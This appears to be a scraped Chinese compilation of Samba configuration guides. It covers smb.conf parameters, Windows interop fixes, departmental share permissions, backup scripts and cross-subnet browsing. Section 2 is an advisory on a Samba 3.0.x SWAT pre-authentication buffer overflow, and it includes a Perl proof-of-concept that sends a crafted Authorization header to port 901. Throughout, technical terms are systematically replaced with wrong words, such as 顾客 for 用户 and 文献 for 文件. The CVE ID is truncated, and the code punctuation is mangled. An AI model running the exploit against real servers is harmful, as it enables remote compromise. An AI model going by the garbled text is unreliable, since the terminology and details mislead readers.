Samba服务器配置资料大全

《Samba服务器配置资料大全》由会员分享，可在线阅读，更多相关《Samba服务器配置资料大全（45页珍藏版）》请在装配图网上搜索。

1、Samba服务器配备资料大全目录Samba服务器配备资料大全11Samba服务器配备文献21.1(1) 全局参数21.2(2) 资源共享的选项51.3(3) 特殊变量71.4文献实例:72Samba 3.x SWAT预验证远程缓冲区溢出漏洞83Samba和Windows 的密码解决认证方式104linuxwindows互联实战经历105Samba3.0服务器实战调试126SMB的扩展应用167Smaba配备文献具体分析（二）221 Samba服务器配备文献/etc/samba/smb.conf功能: 设立samba服务器选项和共享资源的设立文献格式: #阐明语句global /定义samba服

2、务器的全局选项全局参数=值 homes /共享顾客主目录资源共享参数=值 printers / 打印机共享资源共享参数=值 public /共享目录设立资源共享参数=值以上声明为系统自带的声明，顾客也可以根据实际需要定义共享目录： 自定义 /自定义的共享资源共享参数=值阐明：1.1 (1) 全局参数 基本全局参数：Workgroup=域名/工作组名功能：设定samba服务器所属工作组/域的名称)Netbios name=主机名称功能：设立samba服务器的netbios名称Server string=字符串功能：设立samba服务器的描述interfaces=接口名/ip地址功能：设立samb

3、a服务器的ip地址，如果不想使用默认IP地址或者想同步使用多种IP地址，可以设立这个选项client code page=850/936功能:设定客户端存取samba服务器的资源时所使用的字符编码表实例:client code page=936安全设立参数：admin users=顾客名 功能：设立管理员账号socket address=ip地址功能：指定samba服务器监听的ip地址security=user/share/domain/server功能：设立samba的共享安全级别注意：share /表达共享级访问，服务器不对客户机进行身份验证 user /表达顾客级访问server /表达

4、服务器级访问，被访问的samba服务器祈求另一台samba服务器对客户机进行身份验证domain /表达域级访问，由域控制器对客户机进行身份验证password server=ip址址/主机名功能：指定密码服务器的位置，当security值为server/domain必须设立该参数encrypt passwords=yes/no功能：指定与否使用加密口令注意：对于windows客户机来说，该选项应当设立为yesrestrict anonymous=true/false功能：指定服务器与否容许win NT/以匿名方式登录实例：restrict anonymous=falsesmb passwd

5、file=文献途径功能：指定samba顾客密码的文献位置实例：smb passwd file=/etc/samba/smbpasswdmap to guest=never/bad user/bad password功能：设立当顾客所输入的用名和密码不对的时的解决方式注意：该选项只有security=share时才有效，该选项可以取如下三种值：never 表达回绝使用任何资源bad user 表达顾客输入顾客名对的，但密码错误时,可以容许以guest登录bad password 表达顾客输入的顾客名和口令都错误时，可以容许以guest登录username map=文献途径功能：指定SMB顾客名与

6、LINUX顾客名映射文献的途径实例：username map=/etc/samba/smbusersguest account=顾客名功能：指定来宾账号的名称，默觉得nobodyhosts allow= ip地址/主机名域名功能：设立容许访问的客户机hosts deny=ip地址/主机名域名功能：设立严禁访问的客户机打印机设立参数：printcap name=途径功能：设定打印机的配备文献的位置实例：printcap name=/etc/printcapload printers =yes/no功能：设定与否自动装载打印机的装载文献,当要做打印服务器时必须设立为yesprinting = /c

7、ups/bsd/lprng/sysv功能：设立打印机有关指令时所采用的模式实例:printing=lprngprinter name=名称功能:设立打印机的名称日记设立参数: log file=途径功能:定义日记文献的位置实例:log file=/var/log/samba/%m.logmax log size=数字功能:定义日记文献的最大千字节运营效率参数:change notify timeout=数字功能:设立服务器周期性异常告知实例:change notify timeout=90deadtime=数字功能:客户端无操作多少分钟后服务器中断连接实例:deadtime=10getwd c

8、ache=yes/no功能:与否启用cache功能keepalive=数字功能:服务器每隔多少秒向客户端发送keepalive包用于确认客户端与否工作正常max open files=数字功能:同一种客户端最多能打开的文献数目实例:max open files=1000wins设立参数:wins support=yes/no功能:与否支持wins解析实例:wins support=yeswins server=服务器功能:指定wins服务器的位置实例:wins server=192.168.0.2wins proxy=yes/no 功能:设立samba服务器与否支持wins代理功能实例:win

9、s proxy=yes1.2 (2) 资源共享的选项基本参数 : comment=阐明语句功能:对共享资源的阐明path=途径功能:共享资源的途径访问控制参数: browseable=yes/no功能:与否可以浏览共享目录,默觉得yesprintable =yes/no功能:设立客户机与否可以使用共享打印机打印avalidable=yes/no功能:设立共享资源与否可用实例:avalidable=yespublic=yes/no功能:设立共享资源与否容许所有顾客访问,除guest顾客以外guest ok =yes/no功能:设立与否容许guest顾客访问共享资源guest only=yes/n

10、o功能:设立共享目录只容许guest顾客访问read only=yes/no功能:访问顾客对共享资源只读valid users=顾客名/组名功能:设定指定容许访问共享资源的顾客/组,多顾客名用逗号分开,指定组时要在组名前加实例:valide users=u1,u2,g1invalid users=顾客名/组名功能:设定指定严禁访问共享资源的顾客/组,多顾客名用逗号分开,指定组时要在组名前加create mode=权限值功能:指定客户机在共享目录中创立文献的默认权限,默认权限为744directory mode =0775功能:指定客户机共享目录中创立文献目录的默认权限,默认权限为755writ

11、able=yes/no功能:指定共享的途径与否可写write list=顾客名/组名功能:设定容许读写共享目录的顾客列表实例:write list=abc,g2read list=顾客名/组名功能:设定只读访问顾客列表实例:read list=abc,cuo自动执行参数：preexec=途径功能:指定客户机连接时要自动执行文献postexec=途径功能:指定客户机断开连接时要自动执行的文献root preexec=途径功能: 指定客户机连接时要以ROOT顾客身份自动执行的文献实例:root preexec=/bin/mount /dev/cdromroot postexec=途径功能:指定客户

12、机断开连接时要以ROOT顾客身份自动执行的文献实例:root postexec=/bin/umount /dev/cdrom1.3 (3) 特殊变量 %S（大写）: 目前服务名 %P（大写）: 目前服务的根目录 %u: 目前服务的顾客名 %h: samba服务器的主机名 %m: 客户机的NETBIOS名 %L samba服务器的netbios名%v samba版本号%g 给定%u的所在的主工作组名%H 给定的%u的宿主目录%T 目前日期和时间1.4 文献实例:根据如下规定/etc/samba/smb.conf文献:n 设立samba服务器的工作组名为linuxgroup,NETBIOS名为li

13、nuxn 设立samba服务器的访问模式为sharen 共享/soft目录,共享名为soft,该共享目录容许所有的顾客读写操作#vi /etc/samba/smb.conf修改内容如下: global Workgroup=linuxgroup Netbios name=linux Security=share homes printers soft /添加如下这个声明comment=applic soft sharedpath=/softbrowseable=yeswritable=yesguest ok=yespublic=yes2 Samba 3.x SWAT预验证远程缓冲区溢出漏洞严重限

14、度：高威胁限度：远程管理员权限错误类型：边界检查错误运用方式：服务器模式CVE(CAN) ID：CAN-0600受影响系统Samba 3.0.2 Samba 3.0.3 Samba 3.0.4具体描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题，远程袭击者可以运用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文献中的进行HTTP Basic验证的base64_decode_data_blob函数中.测试代码#!/usr/bin/perl# Samba 3.0.4 and priors SWAT A

15、uthorization Buffer Overflow# Created by Noam Rathaus of Beyond Security Ltd.#use IO:Socket;use strict;my $host = $ARGV0;my $remote = IO:Socket:INET-new ( Proto = tcp, PeerAddr = $host, PeerPort = 901 );unless ($remote) die cannot connect to http daemon on $host print connectedn;$remote-autoflush(1)

16、;my $http = GET / HTTP/1.1rHost: $host:901rUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/0712 Firefox/0.9.1rAccept: text/xmlrAccept-Language: en-us,en;q=0.5rAccept-Encoding: gzip,deflaterAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rKeep-Alive: 300rConnection: keep-aliverAuthori

17、zation: Basic =rr;print HTTP: $httpn;print $remote $http;sleep(1);print Sentn;while ()print $_;print n;close $remote;解决方案下载升级程序：Samba 3.0.5：有关信息3 Samba和Windows 的密码解决认证方式 由于两者的密码解决认证方式不同，因此导致输入对的的密码时还是无法通过。 以 Windows 98 来说，系统预设是使用 encrypt 编码的方式，而 samba则是预设使用 text 明码的方式。因此说解决的方式有: 措施一: 把 smb.conf 档案内的

18、 encrypt passwords 改成 = yes : encrypt passwords = yes smb passwd file = /etc/smbpasswd 然后使用 smbpasswd -a xxxx 建立主机上 xxxx user 的 存取密码。往后 windows 98 就使用这个密码即可。 请注意你改的登录要先恢复原状。此方式使用编码的密码 方式来存取。 措施二: 找 /usr/doc/sambaX-XXXX/docs 目录的 .reg 登录档案， 在 windows 98 把该档案汇入系统后即可。让人们是是使用 为明码的方式来存取即可。 4 linuxwindows互

19、联实战经历 本人刚连接完linux和windows98、me、2kserver互联实践，走了不少弯路，现将某些感想和本人所遇到的某些故障现象作一下笔记，以以便初手： 一、samba 一方面要懂得samba是一组 程序，她让你的linux机器懂得smb合同。在运营samba服务器程序的时候，你的linux机器在网络邻居中看起来犹如一台windows的机器。 二、我的配备过程 1、修改smb.conf 我选的是系统默认安装的samba，但系统启动完后，发现samba没有启动，（#ps -axf | grep smb），手动启动（#/etc/rc.d/init.d/smb restart） 修改 /

20、etc/samba/smb.conf 有些书上说是/etc/smb.conf 我也不懂得为什么，也许是版本差别吧。 我就修改了 global组的： workgroup = JD (我的工作组名是JD） netbios name = vmlinux security = user (采用顾客方式验证） encrypt passwords = no (我采用的是明文密码验证） smb passwd file = /etc/smbpasswd (设立smb密码文献的位置） public (把public组前面的“；”全拿掉 path = /pub (共享pub目录） 我就修改了这些，其她就是把#开头

21、的段全删了（碍眼） 2、添加相应目录和顾客 #mkdir pub (添加/pub目录） #adduser test (添加test顾客)注：目前添加的只是linux本机顾客，并没用添加smb顾客，换句话说，test目前不能通过网络访问这台linux主机。 #passwd test (设立test顾客密码） #vi /etc/passwd (把某些你不用或者你不懂得的顾客全删了） # cat /etc/passwd | mksmbpasswd.sh /etc/smbpasswd （把linux本机顾客加到smb顾客里去） #smbpasswd test (设立test顾客的smb访问口令） #/

22、etc/rc.d/init.d/smb restart (重启samba） ok ，linux主机上我就设了这些，下面开始测试 2、测试linux smb（在本机上测试） #smbclient -L /vmlinux (先用smbclient测试本机smb与否工作正常，应能看到/root /public这些目录） #smbclient vmlinuxroot (目前连接目录，提示输入密码，你自己懂得） 这样的话，linux机器互访应当没问题了。 注意：#vi /etc/hosts (添加win98me机器的ip和主机名，看看有无自己的，没有的话也填上） 测试windows的机器前先 找到/us

23、r/share/doc/sambaX-XXXX/docs 下*.reg文献 导入windows的机器,我发现这个还能解决win的机器互访winme、98时常常浮现的怪病，目前2k和98在局域网里访问都正常的要死。 3、测试win98、me 目前能在win98 、me的网上邻居里看到linux机器名了，点击，倒，什么？提示要什么IPC$密码！ 解决措施：控制面板顾客密码添加test顾客(刚刚在smb里面添加的那个顾客）重启，用这个顾客名登陆，目前再访问，应当没问题了（至少我是ok了） 4、测试win 1台(win2k1)提示：请输入顾客名和密码（然后你打什么顾客名和密码都没用） 另一台（win2

24、k2)提示：此账户未得到从这个工作站登陆的许可 再倒！ 解决措施：发现win虽然是用的test顾客名和密码，但是目前登陆在win的域里，我在win本机里添加test顾客，然后用test登陆本机，访问linux机器，目前正常了。5 Samba3.0服务器实战调试fedora预装的samba已经是samba-3.0.0-15,功能已经非常强大了，今天我们调试的重点不是samba3.0的新功能，我们还是先来实现她的基本功能，文献共享服务，至于域控制器功能我会在后来的调试手记中论述。我们今天要实现的环境是，如果公司有财务，技术，领导3个部门，我们分别为3个部门建立3个顾客组为caiwu,network

25、,lingdao;三个部门里各有2个顾客，我们建顾客分别为caiwu01,caiwu02,network01,network02,lingdao01,lingdao02然后我们分别就公司的具体状况建立相应的目录及访问权限，通过如下的例子，但愿人们能在平时的工作中灵活的应用samba的安全权限来设立你们的samba文献服务器。1。一方面服务器采用顾客验证的方式，每个顾客可以访问自己的宿主目录，并且只有该顾客能访问宿主目录，并具有完全的权限，而其她人不能看到你的宿主目录。2。建立一种caiwu的文献夹，但愿caiwu组和lingdao组的人能看到，network02也可以访问，但只有caiwu01

26、有写的权限。3。建立一种lindao的目录，只有领导组的人可以访问并读写，尚有network02也可以访问，但外人看不到那个目录4。建议一种文献互换目录exchange，所有人都能读写，涉及guest顾客，但每个人不能删除别人的文献。5。建议一种公共的只读文献夹public，所有人只读这个文献夹的内容。好，我们先来前期的工作#groupadd caiwu#groupadd network#groupadd lingdao#useradd caiwu01 -g caiwu#useradd caiwu02 -g caiwu#useradd network01 -g network#useradd

27、network02 -g network#useradd lingdao01 -g lingdao#useradd lingdao02 -g lingdao然后我们使用smbpasswd -a caiwu01的命令为6个帐户分别添加到samba顾客中#mkdir /home/samba#mkdir /home/samba/caiwu#mkdir /home/samba/lingdao#mkdir /home/samba/exchange#mkdir /home/samba/public我们为了避免麻烦可以在这里把上面所有的文献夹的权限都设立成777，我们通过samba灵活的权限管理来设立上面的

28、5点规定。如下是我的smb.conf的配备文献globalworkgroup = bmit#我的网络工作组server string = Franks Samba File Server#我的服务器名描述security = user#使用顾客验证机制encrypt passwords = yessmb passwd file = /etc/samba/smbpasswd#使用加密密码机制，在win95和winnt使用的是明文其她的基本上可以按照默认的来。homescomment = Home Directoriesbrowseable = nowritable = yesvalid user

29、s = %Screate mode = 0664directory mode = 0775#homes段满足第1条件caiwucomment = caiwupath = /home/samba/caiwupublic = novalid users = caiwu,lingdao,network02write list = caiwu01printable = no#caiwu段满足我们的第2规定lingdaocomment = lingdaopath = /home/samba/lingdaopublic = nobrowseable = novalid users = lingdao,ne

30、twork02printable = no#lingdao段能满足我们的第3规定exchagecomment = Exchange File Directorypath = /home/samba/exchangepublic = yeswritable = yes#exchange段基本能满足我们的第4规定，但不能满足每个人不能删除别人的文献这个条件，虽然里设立了mask也是没用，其实这个条件只要unix设立一种粘着位就行chmod -R 1777 /home/samba/exchange注意这里权限是1777，类似的系统目录/tmp也具有相似的权限，这个权限能实现每个人能自由写文献，但不能

31、删除别人的文献这个规定publiccomment = Read Only Publicpath = /home/samba/publicpublic = yesread only = yes#这个public段能满足我们的第5规定。到此为止我们的设立已经能实现我们的共享文献规定，记得重启服务哦#/etc/rc.d/init.d/smb restart如果人们没有winodws，不妨先用samba的cilent端命令来测试一下命令的用法我在这里只举几种例子，具体的人们去实验smbclient -L 服务器ip -Nguest帐户查询你的服务器的samba共享状况，你可以检查一下与否lingdao

32、目录时候能被guest帐户看到，应当是看不到的，固然你也可以以某个顾客的名义查看smbclient -L 服务器ip -U caiwu01系统会提示密码，只要输入smb密码就行。smbclient /服务器ip/caiwu -U caiwu01#以caiwu01顾客的名义登录caiwu目录smbmount /服务器ip/caiwu /mnt/caiwu -o username=caiwu01#把服务器的财务目录映射到本地的/mnt/caiwu目录有关samba的其她用法我会在后续的文章中继续，请人们等待！参照资料Samba 配备 OReilly 线上书籍：Samba3.0轻松搞定PDC域服务器

33、 6 SMB的扩展应用在Linux风行的今天，与Windows机器互相共享文献已经是非常普遍的应用了，有关samba的设立的文档也相称的多，本站也有不少了。但是在使用它的高档功能方面还是比较欠缺的，此类文档是非常稀有的，并且只有英文版的，为了以便国内的Linux顾客，我将这些文档整顿一下，翻译过来，并结合自己某些经验，为人们提供某些协助。注：这篇文章并不是一篇有关如何配备samba的基本文档，而是需要阅读者有一定的Linux使用经验，熟悉脚本语言，并且对samba有一定的使用经验。重要是针对于某些公司的Linux网管，或比较有经验的Linux爱好者。这篇文章也其说是文章，不如说是一种技巧提示，

34、但是我个人觉得它意义非常大，特别是对于大中型公司的顾客来讲，它也许非常重要。它重要描述了如果在Linux下使用samba来为使用Windows系统的机器作备份，并且描述了如何跨子网共享samba。1、将Windows机器备分到一台Linux主机上Adam Neat()，向我们提供了如下一段代码，它描述了如何使用smbclient软件包将windows机器备份到Linux主机上。Adam说它可以用来备份windows 3.x和NT机器到一台Linux的磁带机上。另一段代码，是Dan Tager (),提供的，Dan的脚本是通过rsh来备份Unix机器，尽管它可以修改成ssh以便使其更简朴些。在下

35、面这个脚本中，字符串“agnea1”是作备份工作的Linux主机的一种顾客名。 #!/bin/bash clear echo Initialising . checkdate=date | awk print $1 if -f agnea1/backup-dir/backup-data ; then echo ERROR: No config file for today! echo FATAL! exit 1 fi if -d agnea1/backup-dir/temp ; then echo ERROR: No tempoary directory found! echo echo At

36、tempting to create cd agnea1 cd backup-dir mkdir temp echo Directory Made - temp fi if $1 = ; then echo ERROR: enter in a machine name (ie: cdwriter) exit 1 fi if $2 = ; then echo ERROR: enter in a SMB (Lan Manager) Resource (ie: work) exit 1 fi if $3 = ; then echo ERROR: enter in an IP address for

37、$1 (ie: 130.xxx.xxx.52) exit 1 fi # # Main Section # # cd agnea1/backup-dir/temp rm -r agnea1/backup-dir/temp/* cd agnea1/backup-dir/ case $checkdate in Mon) echo Backuping for Monday cat backup-data | /usr/local/samba/bin/smbclient $1$2 -I$3 -N echo Complete if -d agnea1/backup-dir/Monday ; then ec

38、ho Directory Monday Not found . making mkdir agnea1/backup-dir/Monday fi echo Archiving . cd agnea1/backup-dir/temp tar -cf monday.tar *echo done . rm agnea1/backup-dir/Monday/monday.tar mv monday.tar agnea1/backup-dir/Monday ; Tue) echo Backuping for Tuesday cat backup-data | /usr/local/samba/bin/s

39、mbclient $1$2 -I$3 -N echo Complete if -d agnea1/backup-dir/Tuesday ; then echo Directory Tuesday Not found . making mkdir agnea1/backup-dir/Tuesday fi echo Archiving . cd agnea1/backup-dir/temp tar -cf tuesday.tar * echo done . rm agnea1/backup-dir/Tuesday/tuesday.tar mv tuesday.tar agnea1/backup-d

40、ir/Tuesday ; Wed) echo Backuping for Wednesday cat backup-data | /usr/local/samba/bin/smbclient $1$2 -I$3 -N echo Complete if -d agnea1/backup-dir/Wednesday ; then echo Directory Wednesday Not found . making mkdir agnea1/backup-dir/Wednesday fi echo Archiving . cd agnea1/backup-dir/temp tar -cf wedn

41、esday.tar * echo done . rm agnea1/backup-dir/Wednesday/wednesday.tar mv wednesday.tar agnea1/backup-dir/Wednesday ; Thu) echo Backuping for Thrusday cat backup-data | /usr/local/samba/bin/smbclient $1$2 -I$3 -N echo Complete if -d agnea1/backup-dir/Thursday ; then echo Directory Thrusday Not found .

42、 making mkdir agnea1/backup-dir/Thursday fi echo Archiving . cd agnea1/backup-dir/temp tar -cf thursday.tar * echo done . rm agnea1/backup-dir/Thursday/thursday.tar mv thursday.tar agnea1/backup-dir/Thursday ; Fri) echo Backuping for Friday cat backup-data | /usr/local/samba/bin/smbclient $1$2 -I$3

43、-N echo Complete if -d agnea1/backup-dir/Friday ; then echo Directory Friday Not found . making mkdir agnea1/backup-dir/Friday fi echo Archiving . cd agnea1/backup-dir/temp tar -cf friday.tar * echo done . rm agnea1/backup-dir/Friday/friday.tar mv friday.tar agnea1/backup-dir/Friday ; *) echo FATAL

44、ERROR: Unknown variable passed for day exit 1; esac #_这里是Dan的备份脚本：_ #!/bin/bash BACKDIR=3D/backup WINCMD=3D/usr/bin/smbclient function CopyWinHost() # tars and gzips windows shares to a local directory using sambas # smbclient # argument 1 is the remote host windows host name # argument 2 is the sha

45、re name to be backed up echo $1,$2,$3 REMOTE=3D$1 SHARE=3D$2 DEST=3D$3 # create a tarred gzip file using samba to copy direct from a # windows pc # 12345 is a password. Needs some password even if not defined on # remote system $WINCMD $REMOTE$SHARE 12345 -Tc -|gzip $DEST echo date: Done backing up

46、$REMOTE to $DEST echo function CopyUnixHost() # tars and gzips a directory using rsh # argument 1 is the name of the remote source host # argument 2 is the full path to the remote source directory # argument 3 is the name of the local tar-gzip file. day of week # plus .tgz will be appended to argume

47、nt 3 REMOTE=3D$1 SRC=3D$2 DEST=3D$3 if rsh $REMOTE tar -cf - $SRC |gzip $DEST; thenecho date: Done backing up $REMOTE:$SRC to $DEST else echo date: Error backing up $REMOTE:$SRC to $DEST fi # $1: win=3Dbackup windows machine, unix=3Dbackup unix machine case $1 in win)# $2=3D remote windows name, $3=

48、3Dremote share name,# $4=3Dlocal destination directoryCopyWinHost $2 $3 $4; unix)# $2 =3D remote host, $3 =3D remote directory,# $4 =3D destination nameCopyUnixHost $2 $3 $4; esac 以上两个文献都是针对于具体的机器而设计的，如果您准备对自己的机器也进行备份，那么请您安照您自己的机器的具体状况来修改这两个文献的一种，就可以使用了。2、跨子网使用samba许多大型公司有不同的子网，但是如何将另一种子网的内容被其他子网共享，

49、是一种非常核心的问题，许多samba的顾客在这里遇到许多麻烦，如果这点被解决了，那么可以使资源运用率大大提高。使公司的成本减少不少。Andrew Tridgell声称SMB主机在通过有路由的网络共享时有某些问题。这是她的某些建议：跨子网（例如，通过路由）资源浏览，你需要作如下事情。1所有但愿被浏览的的计算机应当使用一种单个的WINS服务器（Samba或NT可以作到这点）2每个子网的master brower必须不是NT就是samba。（win9x不能正常地跨子网工作通讯）3你必须将所有子网的workgroup名字都设成同样的。这并不需要非常严格地遵守，但是这是保证成功的最简朴的方式之一。如果你

50、不能遵守这一条，那么你必须组织一种可以连接两个网络的方式，它可以由两种方式实现：（1）每个browse master注意到在同一广播域中其他的borwse masters的workgroup的描述（2）每个非win9x的browse master要接触所有workgroup的DMB（常用的有：将主域控制器或一种samba服务器标记为domain master），并且周期性地互换browse 信息。固然，其他顾客指出，cisco的路由器可以通过一种方式被设立成解析SMB的交流，并容许浏览。它的建议是将SMB主机的路由接口设立成:ip helper-address x.x.x.x 这里x.x.x.

51、x是这台SMB服务器的IP地址。7 Smaba配备文献具体分析（二）# This is the main Samba configuration file. You should read the# smb.conf(5) manual page in order to understand the options listed# here. Samba has a huge number of configurable options (perhaps too# many!) most of which are not shown in this example# Any line whic

52、h starts with a ; (semi-colon) or a # (hash) # is a comment and is ignored. In this example we will use a # for commentry and a ; for parts of the config file that you# may wish to enable# NOTE: Whenever you modify this file you should run the command testparm# to check that you have not made any ba

53、sic syntactic errors. #= Global Settings =global ；设立整体环境变量# workgroup = NT-Domain-Name or Workgroup-Name workgroup = JIN129 ；设立工作组# server string is the equivalent of the NT Description field server string =linuxcomputer ；设立服务器名阐明，会显示windows的网上邻居中# This option is important for security. It allows yo

54、u to restrict# connections to machines which are on your local network. The# following example restricts access to two C class networks and# the loopback interface. For more examples of the syntax see# the smb.conf man page; hosts allow = 192.168.1. 192.168.2. 127. ；限制容许访问samba服务器的ip地址范畴# if you wan

55、t to automatically load your printer list rather# than setting them up individually then youll need this printcap name = /etc/printcap ；打印机配备文献 load printers = yes ；打印机共享配备# It should not be necessary to spell out the print system type unless# yours is non-standard. Currently supported print systems

56、 include:# bsd, sysv, plp, lprng, aix, hpux, qnx, cups printing = lprng ；设立打印机类型（cups，bsd，plp，lprng等）# Uncomment this if you want a guest account, you must add this to /etc/passwd# otherwise the user nobody is used guest account = jinjin ；设立smb来宾帐号，在share级别下容许匿名登录。这里必须保证jinjin是 linux下的一种实名顾客。而在更高档别的访问中，需要提供密码。